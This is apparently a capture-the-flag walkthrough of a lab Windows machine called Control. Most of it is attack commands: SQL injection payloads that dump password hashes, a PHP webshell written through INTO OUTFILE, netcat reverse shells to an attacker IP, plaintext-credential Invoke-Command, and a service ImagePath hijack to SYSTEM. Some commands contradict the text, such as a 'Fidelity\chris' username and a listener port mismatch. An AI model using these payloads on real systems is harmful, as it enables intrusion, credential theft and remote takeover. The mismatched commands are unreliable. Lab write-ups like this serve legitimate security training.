search

Control

hashtag
Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.167 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane mode, it is the fastest mode of the nmap time template.

  • -Pn assume the host is online.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result into a file, in this case the allports file.

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

nmap -sC -sV -p80,135,3306,49666,49667 10.10.10.167 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result into file, in this case the targeted file.

The website shows a landing page with four buttons.

There is a comment in the source code of the main page with an IP address.

The Admin button will redirect to admin.php, which is asking for a missing header.

hashtag
Exploitation

We could try to bruteforce the header. Let's use wfuzz and set each available header in the wordlist to the IP address we found in the source code.

wfuzz -c --hh=89 -t 200 -w /usr/share/seclists/Miscellaneous/web/http-request-headers/http-request-headers-fields-large.txt -H "FUZZ: 192.168.4.28" http://10.10.10.167/admin.php

The X-Forwarded-For header returns a 200 status code. Let's use BurpSuite as a proxy, and inject this header into every request we make from our browser. Configure it from Proxy > Proxy settings > Match and replace rules.

Now we have access to the admin page.

If we try to find a product with a ' character, an SQL error will appear. Which means that probably the site is vulnerable to SQL Injections.

First, we need to know the number of columns of the current table. As we can see, it has 6 columns, because it doesn't show any errors.

p' order by 6-- -

Now, we could try to list the available databases.

p' union select schema_name,2,3,4,5,6 from information_schema.schemata-- -

There is one database mysql, which usually has two columns called user and password. Let's retrieve the data of those columns.

p' union select user,password,3,4,5,6 from mysql.user-- -

We get password hashes for users root, manager and hector. We can try to break those with rainbow tables.

These credentials might be useful in the future. Let's try to get a shell in the system. Something we could do is check as what user we are running queries in the database.

p' union select user(),2,3,4,5,6-- -

It is the manager user. Which happens to have the FILE privilege, so we can create files in the system.

p' union select grantee,privilege_type,is_grantable,4,5,6 from information_schema.user_privileges-- -

As the web server is using IIS 10.0, the website should be located in C:\intepub\wwwroot\. Create a PHP webshell in that directory.

p' union select "<?php system($_GET[\'cmd\']);?>",2,3,4,5,6 into outfile "c:\inetpub\wwwroot\rce.php"-- -

Now, set a netcat listener on port 4444.

nc -lvnp 4444

  • -l listen mode.

  • -v verbose mode.

  • -p specify the port to listen on.

  • -n numeric-only IP, no DNS resolution.

And a SMB server where the nc.exe binary is located.

impacket-smbserver smbFolder $(pwd) -smb2support

Finally, send a reverse shell to our netcat listener, and get a shell as nt authority\iusr.

curl "http://10.10.10.167/rce.php?cmd=\\10.10.14.11\smbFolder\nc.exe+-e+cmd+10.10.14.11+4444"

hashtag
Privilege Escalation

As seen, there is a local user called Hector.

net user

Which is a member of the Remote Management Users group. We could try to run commands as this user creating PSCredentials and using Invoke-Command with the credentials that got earlier.

powershell

hostname

$user = "Fidelity\chris"

$password = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force

$cred = New-Object System.Management.Automation.PSCredential($user, $password)

Invoke-Command -Credential $cred -ComputerName localhost -ScriptBlock { whoami }

As we can run commands as hector, let's get a reverse shell as him. First, set another netcat listener on port 5555.

rlwrap nc -lvnp 5555

  • -l listen mode.

  • -v verbose mode.

  • -n numeric-only IP, no DNS resolution.

  • -p specify the port to listen on.

Then send the reverse shell using Invoke-Command. Then, we'll be able to grab the user flag.

Invoke-Command -Credential $cred -ComputerName localhost -ScriptBlock { \10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 5555 }

If the PowerShell history file there are a few interesting commands.

type \Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Let's use a PowerShell shell, and inspect these commands. The first one, list keys under CurrentControlSet which Services is one of them.

powershell

get-childitem HKLM:\SYSTEM\CurrentControlset | format-list

The second one lists ACLs of CurrentControlSet.

get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

As this output looks a bit messy, we can view it i a more human-readable way.

$acl = get-acl HKLM:\SYSTEM\CurrentControlSet\Services

ConvertFrom-SddlString -Sddl $acl.Sddl | Foreach-Object {$_.DiscretionaryAcl}

As seen above, hector hash full access over the services. To verify it, let's run WinPEAS.exe. Copy it where the SMB server is located, and run it from the victim machine.

\\10.10.14.11\smbFolder\winPEASany.exe

There are a few services that we can modify. But there is one called seclogon, which when executed, runs with administrator privileges.

powershell (gp -path hklm:\system\currentcontrolset\services\seclogon).ObjectName

We need to change the ImagePath of the service.

reg query HKLM\System\CurrentControlSet\Services\seclogon

Change the ImagePath to our nc.exe binary from out local SMB server, and send a reverse shell to out machine on port 6666.

reg add HKLM\System\CurrentControlSet\Services\seclogon /t REG_EXPAND_SZ /v ImagePath /d "\\10.10.14.11\smbFolder\nc.exe -e cmd 10.10.14.11 4444" /f

Set another netcat listener on port 6666.

nc -lvnp 6666

As we can see, the service is stopped.

sc query seclogon

All we have to do is start the service to get a shell as nt authority\system. Then, all we have to do is reap the harvest and take the root flag.

sc start seclogon

Last updated

Was this helpful?